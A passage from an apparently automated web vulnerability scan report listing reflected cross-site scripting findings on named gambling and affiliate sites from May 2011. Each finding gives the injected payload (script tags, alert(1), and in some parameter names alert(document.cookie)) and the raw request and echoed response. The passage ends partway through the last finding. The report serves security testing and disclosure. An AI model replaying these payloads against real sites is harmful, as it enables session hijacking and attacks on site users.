3.38. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [RegistrationMode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the RegistrationMode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9544'%3balert(1)//639feef7bad was submitted in the RegistrationMode parameter. This input was echoed as c9544';alert(1)//639feef7bad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?CSI=28&LNG=ENG&CUR=GBP&RegistrationMode=PMc9544'%3balert(1)//639feef7bad&BO=FM&BD=info.crazyscratch.com&SDN=CrazyScratch.com& HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jftp2x45snd0xury1lb4a3ir; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19505


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('28','#7dda4d','0','GBP','ENG','0','0','','','','',1,4,5,100,'PMc9544';alert(1)//639feef7bad','FM','CrazyScratch.com','It\'s+money+madness!','CrazyScratch','info.crazyscratch.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.39. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [SDN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the SDN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69960'%3balert(1)//1a3d4ca2f9a was submitted in the SDN parameter. This input was echoed as 69960';alert(1)//1a3d4ca2f9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com&SDN=Winnings.com69960'%3balert(1)//1a3d4ca2f9a&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qknbln55rvubqmvtgokgqr45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19417


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('21','#2f82b6','0','GBP','ENG','0','0','','','','',1,4,5,100,'','','Winnings.com69960';alert(1)//1a3d4ca2f9a','','Winnings.com','info.Winnings.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.40. http://trk.primescratchcards.com/ [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.primescratchcards.com
Path:   /

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload 57616<script>alert(1)</script>3888a68dce1 was submitted in the ac parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ac=5157616<script>alert(1)</script>3888a68dce1&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 11:45:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 507
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=MEFGLCIAPBIIFMKKONEKHNHL; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 5157616<script>alert(1)</script>3888a68dce1 ,130137 ,5143, 201105160000 <font face="Arial" size=2>
<p>Micro
...[SNIP]...

3.41. https://www.aspireaffiliates.com/ [CMI parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecc07"><script>alert(1)</script>964271dc4b6 was submitted in the CMI parameter. This input was echoed as ecc07\"><script>alert(1)</script>964271dc4b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?CMI=1ecc07"><script>alert(1)</script>964271dc4b6 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=1ecc07\"><script>alert(1)</script>964271dc4b6" title="Home">
...[SNIP]...

3.42. https://www.aspireaffiliates.com/ [CMI parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a96c</script><script>alert(1)</script>e23233807d6 was submitted in the CMI parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?CMI=15a96c</script><script>alert(1)</script>e23233807d6 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
k(function(){
       $("#brands_ok_more").show("slow");
   $("#brands_popular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?CMI=15a96c</script><script>alert(1)</script>e23233807d6';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?CMI=15a96c</script>
...[SNIP]...

3.43. https://www.aspireaffiliates.com/ [CMI parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ef6"><script>alert(1)</script>b2d5fefb499 was submitted in the CMI parameter. This input was echoed as 15ef6\"><script>alert(1)</script>b2d5fefb499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?CMI=15ef6"><script>alert(1)</script>b2d5fefb499 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?CMI=15ef6\"><script>alert(1)</script>b2d5fefb499" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.44. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17763"><script>alert(1)</script>f04f9a95002 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 17763\"><script>alert(1)</script>f04f9a95002 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=117763"><script>alert(1)</script>f04f9a95002 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=117763\"><script>alert(1)</script>f04f9a95002" title="Home">
...[SNIP]...

3.45. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eda92</script><script>alert(1)</script>f5f515c1148 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1eda92</script><script>alert(1)</script>f5f515c1148 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1eda92</script><script>alert(1)</script>f5f515c1148';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1eda92</script>
...[SNIP]...

3.46. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4800"><script>alert(1)</script>7b893187770 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as d4800\"><script>alert(1)</script>7b893187770 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=d4800"><script>alert(1)</script>7b893187770 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=d4800\"><script>alert(1)</script>7b893187770" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.47. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb220</script><script>alert(1)</script>85bdb6913a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fb220</script><script>alert(1)</script>85bdb6913a5=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
.click(function(){
       $("#brands_ok_more").show("slow");
   $("#brands_popular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?fb220</script><script>alert(1)</script>85bdb6913a5=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?fb220</script>
...[SNIP]...

3.48. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0cc2"><script>alert(1)</script>b04df9313ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d0cc2\"><script>alert(1)</script>b04df9313ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2"><script>alert(1)</script>b04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2\"><script>alert(1)</script>b04df9313ef=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.49. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a034a"><script>alert(1)</script>761a7e15528 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a034a\"><script>alert(1)</script>761a7e15528 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a034a"><script>alert(1)</script>761a7e15528=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?a034a\"><script>alert(1)</script>761a7e15528=1" title="Home">
...[SNIP]...

3.50. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [CMI parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a43e"><script>alert(1)</script>9fec3b443df was submitted in the CMI parameter. This input was echoed as 3a43e\"><script>alert(1)</script>9fec3b443df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?CMI=13a43e"><script>alert(1)</script>9fec3b443df HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?CMI=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:47:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=13a43e\"><script>alert(1)</script>9fec3b443df" title="Home">
...[SNIP]...

3.51. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e7f5</script><script>alert(1)</script>51625b9e77d was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=12e7f5</script><script>alert(1)</script>51625b9e77d HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=12e7f5</script><script>alert(1)</script>51625b9e77d';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=12e7f5</script>
...[SNIP]...

3.52. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 907ef"><script>alert(1)</script>9ba8bab1929 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 907ef\"><script>alert(1)</script>9ba8bab1929 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=907ef"><script>alert(1)</script>9ba8bab1929 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=907ef\"><script>alert(1)</script>9ba8bab1929" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.53. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd01"><script>alert(1)</script>7c3cf6160b7 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as bdd01\"><script>alert(1)</script>7c3cf6160b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1bdd01"><script>alert(1)</script>7c3cf6160b7 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
